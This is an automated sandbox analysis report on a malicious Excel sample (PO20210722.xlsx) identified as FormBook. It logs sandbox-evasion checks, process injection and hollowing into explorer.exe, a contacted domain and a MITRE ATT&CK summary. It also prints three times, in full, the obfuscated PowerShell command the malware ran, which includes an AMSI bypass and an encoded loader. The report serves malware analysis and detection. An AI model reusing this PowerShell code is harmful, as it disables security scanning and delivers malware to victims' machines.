          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\calc.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: PO20210722.xlsxStream path 'EncryptedPackage' entropy: 7.9988688056 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000C98E4 second address: 00000000000C98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\NAPSTAT.EXERDTSC instruction interceptor: First address: 00000000000C9B4E second address: 00000000000C9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409A80 rdtsc
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3040Thread sleep time: -240000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3048Thread sleep time: -60000s >= -30000s
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2976Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
          Source: explorer.exe, 0000000C.00000000.2211664415.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
          Source: explorer.exe, 0000000C.00000000.2226824283.0000000008399000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0P
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.2218557691.0000000004234000.00000004.00000001.sdmpBinary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
          Source: explorer.exe, 0000000C.00000000.2226824283.0000000008399000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000Z
          Source: explorer.exe, 0000000C.00000000.2218419344.00000000041AD000.00000004.00000001.sdmpBinary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
          Source: explorer.exe, 0000000C.00000000.2234195803.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
          Source: C:\Windows\SysWOW64\calc.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00409A80 rdtsc
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_0040ACC0 LdrLoadDll,
          Source: C:\Windows\SysWOW64\calc.exeCode function: 11_2_00A126F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020A0080 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020A00EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 13_2_020C26F8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\calc.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess token adjusted: Debug
          Source: C:\Users\Public\vbc.exeCode function: 6_2_00401180 Sleep,Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_cexit,_initterm,Sleep,exit,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.jewelryengravings.com
          Injects a PE file into a foreign processesShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeSection loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXESection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\calc.exeThread register set: target process: 1388
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEThread register set: target process: 1388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Windows\SysWOW64\calc.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Windows\SysWOW64\calc.exeSection unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: AB0000
          Writes to foreign memory regionsShow sources
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 400000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 401000
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\calc.exe base: 7EFDE008
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\calc.exe {path}
          Source: C:\Windows\SysWOW64\calc.exeProcess created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\WINDOWS\syswow64\calc.exe'
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,
          Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000000C.00000000.2211664415.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000000C.00000000.2234479423.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation1Path InterceptionProcess Injection712Rootkit1Credential API Hooking1Security Software Discovery321Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsExtra Window Memory Injection1Masquerading111LSASS MemoryProcess Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsShared Modules1Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Security Account ManagerVirtualization/Sandbox Evasion131SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution13Logon Script (Mac)Logon Script (Mac)Process Injection712NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol123SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
